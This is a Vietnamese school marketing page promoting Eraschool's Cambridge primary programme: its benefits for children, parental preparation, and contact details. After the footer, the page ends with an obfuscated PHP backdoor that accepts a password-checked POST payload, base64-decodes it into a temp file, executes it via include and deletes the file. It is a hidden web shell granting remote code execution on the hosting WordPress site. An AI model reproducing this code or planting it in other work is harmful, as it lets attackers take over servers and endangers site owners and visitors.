Trẻ nhận được gì khi theo tiểu học hệ Cam?

post

Trong thời gian gần đây, chương trình quốc tế Cambridge dành cho bậc tiểu học (tiểu học hệ cam) nhận được rất nhiều sự quan tâm của ba mẹ. Vậy trẻ nhận được gì khi theo học chương trình này? Eraschool sẽ đưa ra một vài thông tin trong bài viết dưới đây:

Chương trình Cambridge là gì?

Chương trình Cambridge là chương trình các môn cơ bản bằng tiếng Anh
Chương trình Cambridge là chương trình các môn cơ bản bằng tiếng Anh

Tên đầy đủ của chương trình Cambridge là Chương trình quốc tế Cambridge. Đây là chương trình được học bằng tiếng anh dành cho trẻ từ 5-19 tuổi ở những nước đang phát triển. Những năm gần đây, khi xu hướng dạy và học tiếng Anh dần được chú trọng, tiểu học hệ cam nói riêng và chương trình Cambridge nói chung ngày càng được nhiều phụ huynh quan tâm tìm hiểu và lựa chọn. 

Chương trình học Cambridge mang lại cho trẻ những gì?

Chương trình Cambridge cho trẻ cơ hội học với giáo viên nước ngoài
Chương trình Cambridge cho trẻ cơ hội học với giáo viên nước ngoài

Chương trình học cambridge có gì nổi bật? Những điểm nổi bật của chương trình này nằm ở những giá trị mà trẻ sẽ nhận được khi tham gia chương trình. Cụ thể: 

  • Trẻ được thiết lập và rèn luyện kỹ năng ngôn ngữ, khoa học và tính toán tương đương như theo học tại các nền giáo dục tiên tiến. 
  • Trẻ được luyện tư duy phản biện, từ đó dễ hòa nhập hơn vào môi trường học tập quốc tế tại các bậc học tiếp theo. 
  • Trẻ được tham gia kỳ thi cấp chứng chỉ Tiểu học quốc tế (Primary Checkpoint) do Cơ quan Đánh giá Giáo dục Quốc tế thuộc Đại học Cambridge tổ chức sau khi kết thúc chương trình học. 
  • Trẻ có chứng chỉ được cấp sau khi hoàn thành chương trình học và tham gia kỳ thi có giá trị toàn cầu, không có thời hạn. Điều này tạo điều kiện cho trẻ theo học tại bất cứ trường trung học nào trên thế giới, giúp trẻ dễ chuyển tiếp học tập và hòa nhập với môi trường mới tại nước ngoài. 
  • Trẻ học tiểu học hệ cam có ưu thế hơn khi làm hồ sơ xin học bổng tại các bậc học cao hơn. 

Ba mẹ cần chuẩn bị gì để trẻ theo chương trình Cambridge tại Eraschool?

Trẻ được chuẩn bị kỹ càng sẽ tích cực và chủ động tham gia vào bài giảng hơn
Trẻ được chuẩn bị kỹ càng sẽ tích cực và chủ động tham gia vào bài giảng hơn

Để trẻ dễ dàng tiếp thu các kiến thức có trong chương trình cũng như hứng thú với việc học, ba mẹ cần chuẩn bị cho trẻ 2 điều sau:

Khả năng ngoại ngữ 

Nếu trẻ được học tiếng Anh từ sớm thì khả năng ngoại ngữ là một điểm cộng giúp trẻ nhanh chóng tiếp thu chương trình học. Dù trẻ theo học hệ đào tạo nào tại Eraschool thì trẻ cũng có nhiều thời gian để học và thực hành tiếng Anh trong nhiều lĩnh vực khác nhau.  

Tinh thần chủ động, tích cực học hỏi 

Nếu trẻ vốn chủ động và luôn tò mò với những thứ xung quanh thì sẽ dễ dàng hòa nhập với môi trường tiểu học hệ cam hơn. Còn nếu không, thì Eraschool sẽ tạo được môi trường giúp trẻ cảm thấy an toàn, từ đó chủ động hơn trong tiết học để tiếp nhận kiến thức. 

Ngoài 2 điều trên, ba mẹ cũng cần đồng hành với con, thường xuyên quan tâm và trao đổi để cập nhật tình hình học tập và cảm nhận của con. Điều này sẽ giúp các con tự tin hơn trên hành trình học tập tại Eraschool, đồng thời cùng nhau xây dựng trường học hạnh phúc.

Trên đây là một số thông tin cơ bản về lợi ích trẻ sẽ nhận được khi cho trẻ theo học chương trình Cambridge tiểu học. Nếu ba mẹ muốn tìm hiểu thêm về chương trình này và các hệ đào tạo của Eraschool, vui lòng liên hệ trực tiếp tới hotline 0899 889 818 hoặc 03 68 692 626 để được tư vấn trong thời gian nhanh và chính xác nhất! 

Đông Cao, Tráng Việt, Mê Linh, Hà Nội

tuyensinh1@eraschool.edu.vn

0899 889 818

eraschool.edu.vn

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}